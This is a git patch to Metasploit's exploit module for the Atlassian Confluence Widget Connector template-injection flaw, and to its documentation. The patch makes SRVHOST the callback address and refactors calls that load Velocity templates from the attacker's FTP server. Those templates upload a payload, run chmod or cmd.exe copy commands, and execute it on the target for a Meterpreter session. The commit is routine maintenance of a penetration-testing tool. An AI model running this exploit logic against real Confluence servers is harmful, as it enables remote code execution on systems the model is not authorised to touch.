From cf140f084076ffe22ff4d54e1ca8a1555c74ef76 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 25 Jun 2019 12:43:04 -0500 Subject: [PATCH] Make SRVHOST the callback address --- .../multi/http/confluence_widget_connector.md | 6 ++--- .../multi/http/confluence_widget_connector.rb | 23 ++++++++++--------- 2 files changed, 14 insertions(+), 15 deletions(-) diff --git a/documentation/modules/exploit/multi/http/confluence_widget_connector.md b/documentation/modules/exploit/multi/http/confluence_widget_connector.md index 7949f7d93c..7e427598de 100644 --- a/documentation/modules/exploit/multi/http/confluence_widget_connector.md +++ b/documentation/modules/exploit/multi/http/confluence_widget_connector.md @@ -15,8 +15,6 @@ Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before # Verification Steps -List the steps needed to make sure this thing works - - [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2. - [ ] Start `msfconsole` - [ ] `use exploit/multi/http/confluence_widget_connector` @@ -30,7 +28,7 @@ List the steps needed to make sure this thing works # Options - **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default) -- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default) +- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default) # Scenario ## Tested on Confluence 6.8.2 with Windows target @@ -160,4 +158,4 @@ meterpreter > quit [*] target.com - Meterpreter session 1 closed. Reason: User exit msf5 exploit(multi/http/confluence_widget_connector) > -``` \ No newline at end of file +``` diff --git a/modules/exploits/multi/http/confluence_widget_connector.rb b/modules/exploits/multi/http/confluence_widget_connector.rb index 6fc081b67f..a3bc1dd604 100644 --- a/modules/exploits/multi/http/confluence_widget_connector.rb +++ b/modules/exploits/multi/http/confluence_widget_connector.rb @@ -60,9 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ + OptAddress.new('SRVHOST', [true, 'Callback address for template loading']), OptString.new('TARGETURI', [true, 'The base to Confluence', '/']), OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability', - 'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) + 'https://www.youtube.com/watch?v=kxopViU98Xo']) ]) end @@ -182,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote start_service @check_text = Rex::Text.rand_text_alpha(5..10) - res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm") + res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm") if res && res.body && res.body.include?(@check_text) checkcode = Exploit::CheckCode::Vulnerable end @@ -247,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote # @return [String] def get_java_property(prop) @prop = prop - res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm") + res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm") if res && res.body return clear_response(res.body) end @@ -304,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote @command = "cmd.exe /C copy #{fname} #{new_fname}" end - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm") + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm") end # Returns the normalized file path for payload. @@ -354,10 +355,10 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Attempting to upload #{@fname}") - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm") print_status("Attempting to execute #{@fname}") - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) end @@ -379,14 +380,14 @@ class MetasploitModule < Msf::Exploit::Remote register_files_for_cleanup(@fname, new_fname) print_status("Attempting to upload #{@fname}") - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm") print_status("Attempting to copy payload to #{new_fname}") get_dup_file_code(@fname, new_fname) print_status("Attempting to execute #{new_fname}") @command = new_fname - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) end @@ -406,17 +407,17 @@ class MetasploitModule < Msf::Exploit::Remote register_files_for_cleanup(@fname, new_fname) print_status("Attempting to upload #{@fname}") - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm") @command = "chmod +x #{@fname}" - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm") + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm") print_status("Attempting to copy payload to #{new_fname}") get_dup_file_code(@fname, new_fname) print_status("Attempting to execute #{new_fname}") @command = new_fname - inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) + inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) end def exploit